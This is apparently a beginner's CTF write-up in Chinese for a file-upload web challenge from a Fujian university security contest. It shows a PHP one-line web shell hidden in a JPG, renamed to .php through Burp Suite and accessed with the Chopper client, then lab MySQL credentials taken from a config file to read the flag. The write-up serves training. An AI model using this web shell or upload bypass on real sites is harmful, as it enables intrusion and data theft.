i春秋-第三届“百越杯”福建省高校网络空间安全大赛

i春秋-第三届“百越杯”福建省高校网络空间安全大赛

    • 文件上传
    • 利用菜刀连接数据库

记录一下i春秋里的一道web题,题目类型是文件上传漏洞

传送门:https://www.ichunqiu.com/battalion?t=1&r=61025

主要就两个知识点,很基础,适合新手阅读,大佬勿喷哈

文件上传

来到上传点
i春秋-第三届“百越杯”福建省高校网络空间安全大赛_第1张图片
先上传一个正常的.jpg文件(图片中写入一句话木马)

 eval($_POST['a']) ;?>

在这里插入图片描述

然后打开burp suite抓包,把后缀名jpg修改成php
i春秋-第三届“百越杯”福建省高校网络空间安全大赛_第2张图片i春秋-第三届“百越杯”福建省高校网络空间安全大赛_第3张图片
点击Forward发送数据包,成功上传并返回上传路径,当前目录下的upload/hi.php

i春秋-第三届“百越杯”福建省高校网络空间安全大赛_第4张图片

利用菜刀连接数据库

密码:a
类型:php

i春秋-第三届“百越杯”福建省高校网络空间安全大赛_第5张图片

连上后并没发现flag,但是在html文件夹里找到数据库配置文件

i春秋-第三届“百越杯”福建省高校网络空间安全大赛_第6张图片i春秋-第三届“百越杯”福建省高校网络空间安全大赛_第7张图片猜测flag在数据库里,用菜刀连接数据库
在连接webshell的地方右击数据库管理

i春秋-第三届“百越杯”福建省高校网络空间安全大赛_第8张图片
然后再点击配置
i春秋-第三届“百越杯”福建省高校网络空间安全大赛_第9张图片
填写刚才找到的数据库配置文件,格式为

<T>mysql</T> //数据库
<H>localhost</H> //数据库地址
<U>ctf</U> //账号
<P>ctfctfctf</P> //密码

i春秋-第三届“百越杯”福建省高校网络空间安全大赛_第10张图片
连接成功,在ctf库中找到flag

i春秋-第三届“百越杯”福建省高校网络空间安全大赛_第11张图片

你可能感兴趣的:(信息安全)